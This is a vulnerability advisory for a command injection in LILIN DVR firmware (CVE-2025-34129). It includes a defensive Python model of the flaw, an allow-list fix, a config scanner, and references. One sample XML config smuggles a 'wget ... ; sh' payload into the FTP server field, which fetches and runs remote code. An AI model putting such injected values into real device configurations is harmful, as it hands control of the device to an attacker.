Vulnerability Description
A command injection vulnerability exists in LILIN Digital Video Recorder (DVR) devices running firmware earlier than 2.0b60_20200207. The FTP Server and NTP Server fields of the service configuration are not sanitized before the device uses them to build shell commands. An attacker with access to the configuration interface can upload a crafted XML configuration file with shell commands embedded in these fields; when the device next applies the configuration (for example at the next FTP or NTP synchronization), the injected commands are executed with elevated privileges. The vulnerability was exploited in the wild by botnets including Moobot, as documented in the 360 Netlab reference below.
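The following is an added illustration of the injection pattern described above and of a hardened replacement; it is not LILIN firmware code. The XML layout, the element names, the tool names ("ftpput", "ntpdate") and the sample configurations are all assumptions made for the example, since the real configuration structure is not published on this page. It parses a service configuration, shows how a shell would split the command string the vulnerable pattern builds, and then applies a strict allow-list plus argv-style invocation so no shell ever parses the field. Nothing is executed on the host.

```python
"""Model of the CVE-2025-34129 injection pattern and a hardened replacement.

Added illustration for this page, not LILIN firmware code. The XML layout,
element names and the tool names ("ntpdate", "ftpput") are assumptions; the
real firmware's structure is not published here. Nothing is executed.
"""
import re
import shlex
import xml.etree.ElementTree as ET

# Constructed sample configurations (element names are assumptions).
MALICIOUS_CONFIG = """<?xml version="1.0"?>
<config>
  <ftp><server>ftp.example.org;wget http://198.51.100.1/x -O /tmp/x;sh /tmp/x</server></ftp>
  <ntp><server>pool.ntp.org</server></ntp>
</config>"""

BENIGN_CONFIG = """<?xml version="1.0"?>
<config>
  <ftp><server>ftp.example.org</server></ftp>
  <ntp><server>198.51.100.7</server></ntp>
</config>"""

# Field name -> XPath inside the config (assumed layout).
SERVER_FIELDS = {"ftp_server": "./ftp/server", "ntp_server": "./ntp/server"}

# RFC 1123 hostname (also matches dotted IPv4). A label may not start with
# '-', which also rules out values a tool could parse as an option.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"{_LABEL}(?:\.{_LABEL})*")


def parse_service_fields(xml_text: str) -> dict:
    """Extract the FTP/NTP server values as the firmware would read them."""
    root = ET.fromstring(xml_text)
    return {name: (root.findtext(path) or "").strip()
            for name, path in SERVER_FIELDS.items()}


def build_command_unsafe(tool: str, server: str) -> str:
    """The vulnerable pattern: the raw field is spliced into one shell string
    that would later be handed to /bin/sh (system()/popen()). Shown, not run."""
    return f"{tool} {server}"


def shell_commands(cmd_string: str) -> list:
    """Split a command string the way a POSIX shell would, into separate
    simple commands, to show why ';' in the field yields extra commands."""
    lex = shlex.shlex(cmd_string, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    for tok in lex:
        if tok in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_valid_server(value: str) -> bool:
    """Strict allow-list for a hostname or IPv4 literal; anything else is rejected."""
    return 0 < len(value) <= 253 and _HOSTNAME_RE.fullmatch(value) is not None


def build_argv_safe(tool: str, server: str) -> list:
    """Hardened form: validate first, then hand back an argv list (for execve /
    subprocess.run without shell=True) so no shell ever parses the value."""
    if not is_valid_server(server):
        raise ValueError(f"rejected server field: {server!r}")
    return [tool, server]


def scan_config(xml_text: str) -> list:
    """Defender-side check of an uploaded or exported config: returns the
    (field, value) pairs that do not pass the allow-list."""
    fields = parse_service_fields(xml_text)
    return [(name, value) for name, value in fields.items()
            if not is_valid_server(value)]


if __name__ == "__main__":
    fields = parse_service_fields(MALICIOUS_CONFIG)
    for cmd in shell_commands(build_command_unsafe("ftpput", fields["ftp_server"])):
        print("shell would run:", cmd)
    print("rejected fields:", scan_config(MALICIOUS_CONFIG))
```

Two design points. First, switching from a shell string to an argv list removes the shell from the picture but does not by itself stop argument injection: a value beginning with `-` could still be read as an option by the invoked tool, which is why the allow-list requires the first character to be alphanumeric rather than merely rejecting metacharacters. Second, `scan_config` is the check a defender can run against a configuration backup or an upload captured at the interface to spot the injected fields the 360 Netlab report describes.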
Related Weaknesses (CWE)
- CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
References
- https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day
- https://www.meritlilin.com/assets/uploads/support/file/M00158-TW.pdf
- https://www.vulncheck.com/advisories/lilin-dvr-multiple-vulnerabilities
FAQ
What is CVE-2025-34129?
CVE-2025-34129 is a command injection vulnerability in LILIN DVR devices running firmware earlier than 2.0b60_20200207. The FTP Server and NTP Server fields of the uploaded XML service configuration are not sanitized, so shell commands placed in those fields run on the device with elevated privileges when the configuration is applied.
How severe is CVE-2025-34129?
CVSS scoring is not yet available for CVE-2025-34129. Check NVD for updates.
Is there a patch for CVE-2025-34129?
The description identifies firmware version 2.0b60_20200207 as the first release without the flaw, so updating to that version or later is the remediation. The LILIN document (M00158-TW.pdf) and the VulnCheck advisory in the references section above carry the vendor and third-party details; also restrict who can reach the configuration interface and review any uploaded XML configuration for shell metacharacters in the FTP and NTP Server fields.